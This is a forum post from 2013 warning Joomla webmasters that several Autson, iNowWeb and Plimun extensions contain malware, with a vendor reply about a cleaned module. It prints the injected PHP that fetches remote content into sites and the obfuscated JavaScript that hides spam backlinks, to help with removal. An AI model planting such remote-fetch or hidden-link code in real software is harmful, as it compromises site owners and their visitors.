Recent
Categories
View Replies (1)

Malware in Autson Slideshow

0
Votes
Undo
  1. sniperskulls
    sniperskulls
  3. Commercial Templates
  4. Monday, 12 August 2013
  5.  Subscribe via email
A lot of the templates here (especially for 2.x) are using a infected module. These are malicious injections. It is the Autson Slideshow module. Do not fret it's an easy fix but the admins should know.

This is a notice to all developers / webmasters. Check your site to see if you have any extensions installed from Autson.com AKA iNowWeb.com AKA Plimun.com (possibly more).

Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and do can whatever they like to your website. This is a huge security vulnerability.

The most popular vulnerable extensions are:

- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).

- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.

- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.

- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.

- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).

The hidden backlinks are being inserted via the following code:



<?php

$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);

echo $credit;

?>


or


<?php

$credit=file_get_contents('http:// http://www.autson.com/p.php?i='.$path);

echo $credit;

?>



etc..The file on there server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the php file.


This is what that code is inserting into the site (THIS IS WHAT YOU NEED TO REMOVE FROM THE PHP FILES):


<script language="JavaScript">

function dnnViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',

'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

</script>

      

<p class="dnn"By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>


or


<script language="JavaScript">

function nemoViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',

'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();

</script>



<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>


Additional extensions from these developers that are possibly vulnerable as well:

iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show

Plimun.com:
- Plimun Twitter Ticker
- Twitter Show

So what can we do to stop these spammers/hackers?

Remove the extensions from your or your clients websites (or just remove the malicious code).
Responses (1)
ciaran
ciaran
Love Fool Sherlock Holmes The Voice
Notable Answerer Notable Answerer
Accepted Answer Pending Moderation
0
Votes
Undo
Hi Sniperskulls

Thank you for your post.

We have removed all malicious code from every instance of the Autson slideshow included with a number of our templates. The install the clean version of the module, download the latest package of the template and reinstall the mod_slideshow.zip found in the corresponding folder of your Joomla version.

Alternatively you can download our own J51_Slideshow which can be used in place of the Autson slideshow. This has been made available as a free download at the following dropbox URL... https://dl.dropboxusercontent.com/u/69136519/J51Slideshow_unzip1st.zip

CiarĂ¡n
  1. more than a month ago
  2. Commercial Templates
  3. # 1
  • Page :
  • 1


There are no replies made for this post yet.
Be one of the first to reply to this post!

Site Links

Recommended

Join Our Newsletter

* indicates required
We respect your privacy and do not tolerate spam and will never sell, rent, lease or give away your information (name, email, number, etc.) to any third party. Nor will we send you unsolicited email.
Joomla51 - Mullaghmore, Co. Sligo, Ireland
Joomla51.com is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by
Open Source Matters the trademark holder in the United States and other countries.

We use cookies on our website. Some of them are essential for the operation of the site, while others help us to improve this site and the user experience (tracking cookies). You can decide for yourself whether you want to allow cookies or not. Please note that if you reject them, you may not be able to use all the functionalities of the site.

Ok